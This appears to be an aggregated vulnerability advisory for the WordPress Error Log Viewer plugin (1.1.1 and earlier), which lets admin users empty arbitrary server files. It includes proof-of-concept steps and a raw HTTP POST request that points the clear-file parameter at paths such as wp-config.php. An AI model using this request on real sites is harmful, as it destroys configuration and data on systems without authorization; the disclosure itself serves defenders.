Lucene search
Ceylan BozogullarindanWPEX-ID:166A4F88-4F0C-4BF4-B624-5E6A02E21FA0HistoryNov 10, 2021 - 12:00 a.m.
Error Log Viewer Plugin <= 1.1.1 - Admin+ Arbitrary File Clearing
2021-11-1000:00:00
Ceylan Bozogullarindan
48
0.003 Low
EPSS
Percentile
69.2%
The plugin does not validate the path of the log file to clear, allowing high privilege users to clear arbitrary files on the web server, including those outside of the blog folder
Click the "Log Monitor" available under Error Log Viewer menu item.
Choose a log file to clear.
Intercept the request via Burp or any other local proxy tool.
Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.
Check the content of the cleared file. You will see that the file is empty.
POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 603
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
rrrlgvwr_clear_file=&rrrlgvwr_clear_file_name=/var/www/secret.php&rrrlgvwr_nonce_name=696d5e6ba3Related
wpvulndb
wpvulndb
Error Log Viewer Plugin <= 1.1.1 - Admin+ Arbitrary File Clearing
2021-11-10 00:00:00
nvd
nvd
CVE-2021-24966
2022-03-14 15:15:08
packetstorm
packetstorm
WordPress Error Log Viewer 1.1.1 Arbitrary File Deletion
2022-02-16 00:00:00
zdt
zdt
cve
cve
CVE-2021-24966
2022-03-14 15:15:08
prion
prion
Path traversal
2022-03-14 15:15:00
cvelist
cvelist
exploitdb
exploitdb